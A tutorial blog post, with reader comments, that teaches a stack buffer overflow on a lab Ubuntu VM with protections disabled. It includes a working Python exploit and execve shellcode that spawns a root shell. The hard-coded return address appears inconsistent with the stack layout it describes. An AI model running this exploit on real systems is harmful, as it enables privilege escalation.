Classic Stack Based Buffer Overflow

VM Setup: Ubuntu 12.04 (x86)

This post is the simplest of the exploit development tutorial series, and you can already find many articles about the topic on the internet. Despite that abundance and familiarity, I prefer to write my own blog post on it, since it serves as a prerequisite for many of my future posts!

What is Buffer Overflow?

Copying a source buffer into a destination buffer can overflow the destination when:

The source string is longer than the destination buffer.
No size check is performed.
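The two conditions can be seen in a small simulation. The sketch below is Python 3 and only models memory as a `bytearray`; the helper `unchecked_copy`, the 8-byte buffer size and the neighbouring "SAFE" bytes are illustrative assumptions, not part of the vulnerable program shown later.

```python
# Model a flat region of memory: an 8-byte destination buffer followed
# immediately by 4 bytes that belong to some other variable.
BUF_SIZE = 8

def unchecked_copy(memory, dest_offset, src):
    """Copy src up to (not including) its first NUL byte, then write a
    terminating NUL, like strcpy(). No size check is performed."""
    i = 0
    for byte in src:
        if byte == 0:
            break
        memory[dest_offset + i] = byte
        i += 1
    memory[dest_offset + i] = 0
    return memory

memory = bytearray(BUF_SIZE) + bytearray(b"SAFE") + bytearray(4)
unchecked_copy(memory, 0, b"A" * 10)      # 10 bytes into an 8-byte buffer

# The bytes that used to hold "SAFE" are now partly overwritten.
neighbour = bytes(memory[BUF_SIZE:BUF_SIZE + 4])
print(neighbour)
```

Ten bytes plus the terminating NUL are written into an 8-byte buffer, so the first three bytes of the neighbouring data are clobbered.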

There are two types of buffer overflow:

Stack Based Buffer Overflow – Here the destination buffer resides on the stack
Heap Based Buffer Overflow – Here the destination buffer resides on the heap

In this post, I will talk only about stack based buffer overflow. Heap overflows will be discussed in ‘Level 3’ of the Linux (x86) Exploit Development Tutorial Series!

Buffer overflow bugs can lead to arbitrary code execution!

What is arbitrary code execution?

Arbitrary code execution lets an attacker run their own code in order to gain control of the victim machine. Control can be gained in many ways, such as spawning a root shell, adding a new user, or opening a network port.

Enough definitions, let's look at some code that is vulnerable to buffer overflow!

Vulnerable Code:

//vuln.c
#include <stdio.h>
#include <string.h>

int main(int argc, char* argv[]) {
        /* [1] */ char buf[256];
        /* [2] */ strcpy(buf,argv[1]);
        /* [3] */ printf("Input:%s\n",buf);
        return 0;
}

Compilation Commands:

#echo 0 > /proc/sys/kernel/randomize_va_space
$gcc -g -fno-stack-protector -z execstack -o vuln vuln.c
$sudo chown root vuln
$sudo chgrp root vuln
$sudo chmod +s vuln
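These commands switch off three protections: writing 0 to randomize_va_space disables ASLR (this needs root, hence the # prompt), -fno-stack-protector omits stack canaries, and -z execstack marks the stack executable. A minimal Python 3 sketch for checking the ASLR setting follows; the helper name `aslr_mode` and its `path` parameter are assumptions made for illustration, and the demonstration reads a stand-in temporary file so it runs on any machine.

```python
import os
import tempfile

# Meaning of each value of /proc/sys/kernel/randomize_va_space on Linux.
ASLR_MODES = {
    0: "disabled",
    1: "stack, mmap base and vDSO randomized",
    2: "as 1, plus heap (brk) randomized",
}

def aslr_mode(path="/proc/sys/kernel/randomize_va_space"):
    """Return (value, description) read from the given sysctl file."""
    with open(path) as f:
        value = int(f.read().strip())
    return value, ASLR_MODES.get(value, "unknown")

# Demonstration on a stand-in file; on the lab VM, call aslr_mode()
# with no argument to read the real setting.
with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as tmp:
    tmp.write("0\n")
demo = aslr_mode(tmp.name)
os.unlink(tmp.name)
print(demo)
```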

Line [2] of the vulnerable program above contains the buffer overflow bug: strcpy copies argv[1] into the 256-byte ‘buf’ without checking its length. This bug can lead to arbitrary code execution, since the source buffer contents are user-provided input!

How is arbitrary code execution achieved?

Arbitrary code execution is achieved using a technique called “Return Address Overwrite”. This technique lets the attacker overwrite the return address stored on the stack, so that when the function returns, execution continues at an address of the attacker's choosing.

Before looking at the exploit code, let's disassemble the vulnerable code and draw its stack layout for better understanding!

Disassembly:

(gdb) disassemble main
Dump of assembler code for function main:
   //Function Prologue
   0x08048414 <+0>:	push   %ebp                      //backup caller's ebp
   0x08048415 <+1>:	mov    %esp,%ebp                 //set callee's ebp to esp

   0x08048417 <+3>:	and    $0xfffffff0,%esp          //stack alignment
   0x0804841a <+6>:	sub    $0x110,%esp               //stack space for local variables
   0x08048420 <+12>:	mov    0xc(%ebp),%eax            //eax = argv
   0x08048423 <+15>:	add    $0x4,%eax                 //eax = &argv[1]
   0x08048426 <+18>:	mov    (%eax),%eax               //eax = argv[1]
   0x08048428 <+20>:	mov    %eax,0x4(%esp)            //strcpy arg2 
   0x0804842c <+24>:	lea    0x10(%esp),%eax           //eax = 'buf' 
   0x08048430 <+28>:	mov    %eax,(%esp)               //strcpy arg1
   0x08048433 <+31>:	call   0x8048330 <strcpy@plt>    //call strcpy
   0x08048438 <+36>:	mov    $0x8048530,%eax           //eax = format str "Input:%s\n"
   0x0804843d <+41>:	lea    0x10(%esp),%edx           //edx = buf
   0x08048441 <+45>:	mov    %edx,0x4(%esp)            //printf arg2
   0x08048445 <+49>:	mov    %eax,(%esp)               //printf arg1
   0x08048448 <+52>:	call   0x8048320 <printf@plt>    //call printf
   0x0804844d <+57>:	mov    $0x0,%eax                 //return value 0

   //Function Epilogue
   0x08048452 <+62>:	leave                            //mov %ebp,%esp; pop %ebp;
   0x08048453 <+63>:	ret                              //return
End of assembler dump.
(gdb)

Stack Layout:
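The layout can be derived by replaying the prologue from the disassembly. The following is a minimal Python 3 sketch, assuming the return address slot sits at 0xbffff1fc (the value reported later in this post for the 272-byte test input); `stack_layout` is a hypothetical helper name.

```python
def stack_layout(ret_slot):
    """Replay main()'s prologue and return (name, address, size) regions,
    highest address first. ret_slot is the address holding the return address."""
    ebp = ret_slot - 4                 # push %ebp ; mov %esp,%ebp
    esp = ebp & 0xfffffff0             # and $0xfffffff0,%esp
    gap = ebp - esp                    # bytes skipped by the alignment
    esp -= 0x110                       # sub $0x110,%esp
    buf = esp + 0x10                   # lea 0x10(%esp),%eax
    return [
        ("return address", ret_slot, 4),
        ("caller's EBP", ebp, 4),
        ("alignment space", ebp - gap, gap),
        ("buf", buf, 0x100),
        ("strcpy/printf arguments", esp, 0x10),
    ]

layout = stack_layout(0xbffff1fc)
for name, address, size in layout:
    print(f"{address:#010x}  {size:#5x}  {name}")
```

Each row gives the lowest address of a region and its size. Under the stated assumption, ‘buf’ starts at 0xbffff0f0 and the regions above it are the alignment space, the caller's EBP and the return address.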

As we already know, user input longer than 256 bytes overflows the destination buffer, and a long enough input overwrites the return address stored on the stack. Let's test it by sending a series of “A”s.

Test Step 1: Is Return Address Overwrite possible?

$ gdb -q vuln
Reading symbols from /home/sploitfun/lsploits/new/csof/vuln...done.
(gdb) r `python -c 'print "A"*300'`
Starting program: /home/sploitfun/lsploits/new/csof/vuln `python -c 'print "A"*300'`
Input:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) p/x $eip
$1 = 0x41414141
(gdb)

The output above shows that the instruction pointer register (EIP) is overwritten with “AAAA” (0x41414141), which confirms that return address overwrite is possible!
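Why EIP ends up holding 0x41414141 can be modelled without running the binary. The Python 3 sketch below treats main()'s frame as a `bytearray` that starts at ‘buf’; `simulate_strcpy` is a hypothetical helper, and the original return address 0x08048400 is a made-up placeholder value.

```python
import struct

BUF_SIZE, ALIGN_GAP, SAVED_EBP = 0x100, 0x8, 0x4
RET_OFFSET = BUF_SIZE + ALIGN_GAP + SAVED_EBP   # 0x10c bytes above buf

def simulate_strcpy(argument):
    """Return the 32-bit value left in the return address slot after an
    unchecked, NUL-terminated copy of argument into buf."""
    # Memory from buf upwards; the extra room stands in for the caller's stack.
    frame = bytearray(RET_OFFSET + 4 + 64)
    struct.pack_into("<I", frame, RET_OFFSET, 0x08048400)  # made-up original value
    data = argument.split(b"\x00")[0] + b"\x00"            # strcpy stops at NUL
    frame[:len(data)] = data
    return struct.unpack_from("<I", frame, RET_OFFSET)[0]

short = simulate_strcpy(b"A" * 100)   # fits inside buf
long_ = simulate_strcpy(b"A" * 300)   # runs past the return address slot
print(hex(short), hex(long_))
```

With 100 bytes the placeholder return address survives; with 300 bytes the slot holds four “A” bytes, which is the value `ret` loads into EIP.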

Test Step 2: What is the offset from Destination Buffer?

Now let's find the offset of the return address from the destination buffer ‘buf’. The disassembly and stack layout for main() show that the return address is located at offset 0x10c from ‘buf’. 0x10c is calculated as follows:

0x10c = 0x100 + 0x8 + 0x4

where

0x100 is ‘buf’ size
0x8 is alignment space
0x4 is caller’s EBP
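The 0x8 of alignment space is not a fixed property of the program: it is whatever `and $0xfffffff0,%esp` discards, so it depends on the value of ESP when main() is entered. A minimal Python 3 sketch of the arithmetic follows, with `alignment_gap` and `offset_to_return_address` as hypothetical helper names and the extra addresses in the loop chosen only for illustration.

```python
def alignment_gap(ret_slot):
    """Bytes discarded by 'and $0xfffffff0,%esp' in main()'s prologue.
    ret_slot is the stack address that holds main()'s return address."""
    ebp = ret_slot - 4            # ESP after 'push %ebp'
    return ebp & 0xf              # low four bits cleared by the 'and'

def offset_to_return_address(ret_slot, buf_size=0x100, saved_ebp=4):
    """Distance in bytes from the start of buf to the return address slot."""
    return buf_size + alignment_gap(ret_slot) + saved_ebp

offset = offset_to_return_address(0xbffff1fc)
print(hex(offset), offset)

# The gap changes if the stack starts elsewhere, for example with a
# different environment or argument length (hypothetical addresses):
for slot in (0xbffff1f4, 0xbffff1f8, 0xbffff1fc, 0xbffff200):
    print(hex(slot), alignment_gap(slot), offset_to_return_address(slot))
```

This is why the offset should be confirmed with a test input, as done next, rather than assumed to be 268 on every system.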

Thus user input of the form “A” * 268 + “B” * 4 overwrites ‘buf’, the alignment space and the caller’s EBP with “A”s, and the return address with “BBBB”.

$ gdb -q vuln
Reading symbols from /home/sploitfun/lsploits/new/csof/vuln...done.
(gdb) r `python -c 'print "A"*268 + "B"*4'`
Starting program: /home/sploitfun/lsploits/new/csof/vuln `python -c 'print "A"*268 + "B"*4'`
Input:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) p/x $eip
$1 = 0x42424242
(gdb)

The output above shows that the attacker controls the return address. The return address, located at stack address 0xbffff1fc, is overwritten with “BBBB”. With this information, let's write an exploit program to achieve arbitrary code execution.

Exploit Code:

#!/usr/bin/env python
#exp.py
import struct
from subprocess import call

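#Stack address the overwritten return address points to. It must land in the
#NOP sled or on the shellcode; the exact value differs between environments.
ret_addr = 0xbffff1d0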
              
#Spawn a shell
#execve(/bin/sh)
scode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

#endianness conversion (32-bit little-endian)
def conv(num):
    return struct.pack("<I",num)

# buf = Junk + RA + NOP's + Shellcode
buf = "A" * 268
buf += conv(ret_addr)
buf += "\x90" * 100
buf += scode

print "Calling vulnerable program"
call(["./vuln", buf])
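The script above is Python 2, the default `python` on Ubuntu 12.04. Under Python 3 the payload has to be built as `bytes`. The sketch below only builds and inspects the payload and does not launch ./vuln; `build_payload` and `sled_window` are hypothetical helper names, and 0xbffff1fc is used purely as an example slot address that would have to be re-measured for a run with the full-length payload.

```python
import struct

SHELLCODE = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
             b"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")

def build_payload(ret_addr, offset=268, sled_len=100):
    """Junk + return address (little-endian) + NOP sled + shellcode."""
    payload = b"A" * offset
    payload += struct.pack("<I", ret_addr)
    payload += b"\x90" * sled_len
    payload += SHELLCODE
    # strcpy() stops at the first NUL byte, so none may appear in the payload.
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte")
    return payload

def sled_window(ret_slot, sled_len=100):
    """Addresses [start, end) covered by the NOP sled, given the address of
    the return address slot measured for a run with this payload length."""
    start = ret_slot + 4
    return start, start + sled_len

payload = build_payload(0xbffff1d0)
print(len(payload), payload[268:272])
print([hex(a) for a in sled_window(0xbffff1fc)])
```

Any return address inside the sled window slides into the shellcode, provided the address itself contains no NUL byte. The start of the example window, 0xbffff200, would be rejected by `build_payload` for that reason.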

Executing the above exploit program gives us a root shell, as shown below:

$ python exp.py 
Calling vulnerable program
Input:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��������������������������������������������������������������������������������������������������������1�Ph//shh/bin��P��S���

# id
uid=1000(sploitfun) gid=1000(sploitfun) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),1000(sploitfun)
# exit
$

NOTE: In order to get this root shell, we turned off many exploit mitigation techniques. In fact, for all the posts in Level 1, I have disabled these exploit mitigation techniques, since the objective of Level 1 is to introduce you to vulnerabilities. The real fun happens when we get to “Level 2” of the Linux (x86) Exploit Development Tutorial Series, where I will talk about bypassing these exploit mitigation techniques!

10 thoughts on “Classic Stack Based Buffer Overflow”

tester says:

December 27, 2015 at 4:09 pm

Thanks for your exploit articles!
If you read this article and your exploit works under gdb but not without it, here is the solution to your problem: http://www.mathyvanhoef.com/2012/11/common-pitfalls-when-writing-exploits.html

Ken says:

October 14, 2016 at 7:57 pm

Exploit code contains syntax errors. Line 15 EOL while scanning single-quoted string. Is it just me, or is something missing?

hasnydes says:

December 11, 2016 at 8:43 am

You didn’t explain how to get this address from gdb, i.e. how to see where our shellcode is:
“ret_addr = 0xbffff1d0”

- Nathan Jester says:
  
  July 3, 2017 at 4:34 pm
  
  I know this is an older post, but perhaps it will help others who have the same question. I was able to determine the address of ESP on my system in the following way.
  
  use the command:
  
  Program received signal SIGSEGV, Segmentation fault.
  0x42424242 in ?? ()
  (gdb) x/x $esp
  0xbffff1f0: 0x43434343
  
  This will tell you where ESP has been overwritten. That will be the value that you replace your \x42’s with. You must allow for the endianness as well.
  
  so:
  
  buffer = "\x41" * 268 + "\xf0\xf1\xff\xbf" + "\x90" * 100 + shellcode
  
Sploitfun- Can't "peform" stack based buffer overflow in GDB - Blog Xclusive News says:

August 6, 2017 at 12:37 am

[…] While trying to go through the tutorial in : https://sploitfun.wordpress.com/2015/05/08/classic-stack-based-buffer-overflow/ […]

kevin says:

January 31, 2018 at 12:59 pm

The exploit code is wrong!

Vadym says:

December 30, 2019 at 4:33 pm

How did you calculate the address 0xbffff1d0?
I can't see why it is less than 0xbffff1fc, because the shellcode is placed at a higher address than the return address stored on the stack.

- Vadym says:
  
  January 2, 2020 at 7:34 am
  
  I understand now, 0xbffff1d0 is used because the shellcode is placed before EIP, not after.
  
jacksonSang says:

October 21, 2020 at 1:35 pm

I have a question: how is the alignment space calculated?

Nikolaos Parisis says:

March 19, 2021 at 11:36 am

Can you please explain why you don't just put the NOPs (272-29) + shellcode (25) + RET (4), and instead overflow with 268 “A”s, then append the RET, then the NOPs, and the shellcode at the end? I mean, why overflow it and then inject the NOPs and shellcode? Does it also work the other way? We could use the NOPs and the actual shellcode to overflow, with the RET at the end, right? Thanks a lot 🙂
